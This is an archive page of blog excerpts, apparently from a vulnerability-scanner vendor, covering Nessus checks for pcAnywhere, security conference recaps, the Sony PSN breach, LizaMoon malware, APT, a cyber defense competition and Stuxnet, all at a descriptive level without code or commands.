Current Affairs

Scanning for pcAnywhere

by Ron Gula on January 30, 2012

Note -- this blog was updated on Feb 2, 2012 to highlight detection of the Symantec advisory SYM12-002 as well as new additional Nessus local checks to audit pcAnywhere installations. With the recent news from Symantec that their source code theft has left pcAnywhere open to attack, it makes sense to audit your network for instances of this desktop sharing software. Nessus has many checks that identify the presence of pcAnywhere, the type of network access supported by it, and some vulnerabilties in the application. A current list is shown below for reference: 10006 Symantec pcAnywhere Status Service Detection (UDP) 10794 Symantec pcAnywhere Detection (TCP) 10798 Symantec pcAnywhere Service Unrestricted Access 20743 Symantec pcAnywhere Launch with Windows Caller Properties Local Privilege Escalation 32133 Symantec pcAnywhere Access Server Detection Service 35976 Symantec pcAnywhere CHF File Pathname Format String Denial of Service 57795 Symantec pcAnywhere Installed (local check) 57796 Symantec pcAnywhere Multiple Vulnerabilitities (SYM12-002)

Black Hat 2011: The Rise Of The Machines

by Paul Asadoorian on August 10, 2011

I attended the Black Hat Briefings this year after teaching the "Advanced Vulnerability Scanning Using Nessus" course. There were several really great presentations covering a wide range of topics. My only wish is that I could have cloned myself and attended more of the talks! Following is a recap of the presentations I attended: Tenable CEO/CTO Ron Gula presenting in the vendor area at Black Hat, showcasing SecurityCenter, the Passive Vulnerability Scanner, Nessus, and the Log Correlation Engine being used together to detect targeted attacks against systems. Don Bailey - War Texting Weaponizing Machine 2 Machine Several of the presentations this year centered on the topic of embedded systems. This is right up my alley, as I've always had a fascination with embedded computing. Don gave some great examples of embedded systems, including:

Sony: Compliance Lessons Learned

by Paul Asadoorian on May 12, 2011

The Now "Infamous" Sony Hack It was reported late last month that attackers had penetrated Sony's PSN (PlayStation Network) platform. It has been rumored that reverse engineering the PlayStation firmware, coupled with vulnerabilities in Linux servers and unencrypted data traversing the network, led to the exposure of over 77 million users’ information being leaked, possibly including 2.2 million credit card numbers. Sony reportedly may have lost so many credit card numbers that there is speculation it could devalue all stolen cards on the black market .

Preventing & Detecting Malware: A Multifaceted Approach

by Paul Asadoorian on April 5, 2011

Successful Attacks from Automated Malware Recently, malware dubbed "LizaMoon" (named after the first web site found distributing it) has been popping up in the news: Dubbed LizaMoon, unidentified perpetrators of the scareware campaign inject script into legitimate URLs, so when people try to access the website, they get redirected to a page warning them that their PCs are infected with malware that can be removed by downloading a free AV application called Windows Stability Center. From LizaMoon SQL Injection Attack Hits Websites LizaMoon scans web sites for easily exploitable SQL injection vulnerabilities, then uses that to put redirects on the web site that take users to a site which installs malware. This is not a new form of attack, however the "Lizamoon" malware has been surprisingly successful. Google searches for infected sites report that over 1.5 million pages have been infected. The important thing to not about the numbers of infection is "pages" does not refer to sites, as a site can have multiple infected pages. This type of attack typically works as follows:

APT - There.. I Said It.

by Paul Asadoorian on March 24, 2011

Recently I attended the Secure World Boston conference to sit in on a panel with industry experts about APT (Advanced Persistent Threat, for a great write-up on the definition see Richard Bejtlich's article titled, " What Is APT and What Does It Want? "). Following are some of my thoughts on the topic: Is APT something that everyone should be worrying about and planning for (is APT pervasive or just hype)? – APT is a new buzzword, but of course such threats have been around as long as there have been computer networks. It makes me think back Clifford Stoll’s book titled “The Cuckoos Egg”. I love Cliff’s analogy of “jiggling” the keys over the communications lines to disrupt the attackers just enough, but still give them enough access to keep an eye on them. Explain how APT works (reconnaissance, phishing, infection, exfiltration)? – The recon phase is the toughest to defend against and the most important phase to an attacker. Pre-texting is so important, yet much of the information has to be public and it’s tough to detect when someone is doing recon. This may turn into targeted phishing attacks, which are increasingly more successful. No matter how hard we try, we can’t educate all our users and expect them to catch 100% of the attacks - we have to rely on technology and training to ward off these attacks. Inevitably, people get into our systems and we need to have measures to detect unauthorized access to our systems. It’s presumptuous to think that your organization will never have a breach.

Mid-Atlantic CCDC - Lessons Learned in Communication

by Paul Asadoorian on March 17, 2011

The CCDC 2011 The Collegiate Cyber Defense Competition (CCDC) is always a fantastic and educational event, and this year was no exception. Hundreds of people converged to share ideas, learn how to hack, learn how to defend and talk about security. Below is a brief summary of the happenings at the event: The Attackers - Many of the same people as previous years filled the role of the "hackers". They did a great job this year and showed how much they've learned over the years. The big takeaway from the Red Team is sharing. Using a new tool called " Armitage ", they were able to share shell access to the Blue Team hosts, proving that sharing truly is caring. The Defenders - By design, the Blue teams are put at a disadvantage. This is meant to emulate the real world, where attackers have vast resources and often stay a step ahead. However, the Blue teams were very creative, employing reverse sabotage by leaving pieces of paper around the event with usernames and passwords written on them, which were completely fake. The Red Team was able to re-configure the Blue Team's phones and leave them messages on the display, a digital "love note" if you will. Phones for the Blue Team were ringing throughout the event, playing random WAV files from a server as well.

Shmoocon 2011 Conference Wrap-Up

by Paul Asadoorian on February 1, 2011

Getting to ShmooCon each year is always challenging (as is trying to get home). Mother Nature seems to enjoy disrupting the travel to and from the conference, which is held in Washington, D.C in January or February of each year. Despite the weather issues, I've always found it to be a conference worth attending. It features quality talks, leading security researchers sharing thoughts and ideas and several extra events such as "Firetalks" and "Hacker Karaoke". From Printer to Domain Admin I've always been fascinated with the concept of attacking printers. The common misconception of "oh, it’s only a printer" makes them a prime target for attackers because people believe that printers pose little to no security risk. This mindset typically translates to the following conditions, which help to fuel my fascination:

Microsoft Patch Tuesday Roundup - September 2010 - "Silent but deadly" Edition

by Paul Asadoorian on September 15, 2010

"Silent" Worms: Stuxnet The vulnerability patched with MS10-061 is perhaps one of the most interesting we've covered in a "Patch Tuesday" post this year. The vulnerability was discovered when antivirus researchers at Kaspersky Lab analyzed malware called "Stuxnet". The malware was one of the first worms to use the LNK vulnerability , and contained code to exploit three other vulnerabilities, the print spooler vulnerability patched by MS10-061 and two other unnamed privilege escalation vulnerabilities that have yet to be patched. Its not everyday that we hear of malware in the wild exploiting 4 0-day vulnerabilities. I am not easily impressed (in fact, I am even less than impressed) with the capabilities of most malware in the wild. However, there are some facts about the "Stuxnet" malware that do impress me: Stuxnet also contains an exploit for a vulnerability from 2008. It will only execute this exploit if it determines it is inside an organization using SCADA systems and not a typical corporation. Stuxnet was written specifically to attack control systems , and is the first publicly known malware to contain a rootkit for PLCs, devices that control SCADA systems. The rootkit silently waits for commands. Stuxnet gains access to control systems using default passwords and is rumored to have compromised 14 different control systems-based organizations. Stuxnet was first thought to primarily use USB devices to propagate (likely to get around "air gapped" security measures) There was an interesting quote from Symantec that stated, "Symantec gained control of the domain used to send commands to infected machines shortly after Stuxnet was discovered". Apparently, this turned over control of Stuxnet-infected systems to Symantec. I just don't understand the logic behind the malware authors; if they had used fast flux , they may still have control over the botnet they seemed to have worked so hard to implement. There are actually 6 ninjas in the above picture… can you spot them all?